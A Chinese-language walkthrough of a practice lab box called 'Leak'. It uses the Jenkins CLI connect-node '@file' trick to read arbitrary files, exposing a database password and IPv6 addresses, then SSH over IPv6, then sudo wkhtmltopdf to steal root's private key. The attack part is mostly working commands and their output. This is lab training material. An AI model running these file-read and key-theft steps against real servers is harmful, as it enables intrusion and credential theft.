# 靶场练习
下载:Leak
Nat,IP: 192.168.1.150
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
80/tcp open http Apache httpd 2.4.56 ((Debian)) | |
|_http-title: Apache2 Debian Default Page: It works | |
|_http-server-header: Apache/2.4.56 (Debian) | |
8080/tcp open http Jetty 10.0.13 | |
| http-robots.txt: 1 disallowed entry | |
|_/ | |
|_http-title: Panel de control [Jenkins] | |
|_http-server-header: Jetty(10.0.13) | |
| http-open-proxy: Potentially OPEN proxy. | |
|_Methods supported:CONNECTION |
8080 扫一下,点看瞅了瞅发现是 Jenkins,扫了下目录点了点,获取 Jenkins 2.401.2 这个版本
搜一下漏洞,发现利用方式
下载: wget http://192.168.1.150:8080/jnlpJars/jenkins-cli.jar
┌──(root㉿kali)-[~] | |
└─# java -jar jenkins-cli.jar -s http://192.168.1.150:8080/ -http connect-node "@/var/www/html/connect.php" | |
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true | |
: anonymous no tiene el permiso Nodo/Connect | |
$password = "g30rg3_L3@k3D";: No such agent "$password = "g30rg3_L3@k3D";" exists. | |
$servername = "localhost";: No such agent "$servername = "localhost";" exists. | |
<?php: No such agent "<?php" exists. | |
$username = "george";: No such agent "$username = "george";" exists. | |
?>: No such agent "?>" exists. | |
ERROR: Error occurred while performing this command, see previous stderr output. |
拿到了账号密码
无法登陆,没有 22 端口,死局
搜了下发现要 IPV6
┌──(root㉿kali)-[~] | |
└─# java -jar jenkins-cli.jar -s http://192.168.1.150:8080 -http connect-node "@/proc/net/if_inet6" | |
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true | |
00000000000000000000000000000001 01 80 10 80 lo: No such agent "00000000000000000000000000000001 01 80 10 80 lo" exists. | |
fe80000000000000020c29fffed6cab6 02 40 20 80 ens33: No such agent "fe80000000000000020c29fffed6cab6 02 40 20 80 ens33" exists. | |
ERROR: Error occurred while performing this command, see previous stderr output. | |
┌──(root㉿kali)-[~] | |
└─# nmap -p- -A -6 fe80:0000:0000:0000:020c:29ff:fed6:cab6 | |
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-27 00:56 EDT | |
Nmap scan report for fe80::20c:29ff:fed6:cab6 | |
Host is up (0.00090s latency). | |
Not shown: 65532 closed tcp ports (reset) | |
PORT STATE SERVICE VERSION | |
22/tcp open tcpwrapped | |
|_ssh-hostkey: ERROR: Script execution failed (use -d to debug) | |
80/tcp open tcpwrapped | |
8080/tcp open tcpwrapped |
有 ssh 端口了,连上去
┌──(root㉿kali)-[~] | |
└─# ssh -6 george@fe80:0000:0000:0000:020c:29ff:fed6:cab6%eth0 |
拿到了 george 的 shell
# 提权
sudo -l 发现了 /usr/bin/wkhtmltopdf ,直接把私钥转成 pdf,然后放到 /var/www/html 中,访问拿到私钥
┌──(root㉿kali)-[~] | |
└─# ssh -i id_rsa -6 fe80:0000:0000:0000:020c:29ff:fed6:cab6%eth0 | |
root@leak:~# cat .r00000000000000t.txt | |
89c441988949961e48d5085c3d70c9f1 |
拿到了 root 的 shell
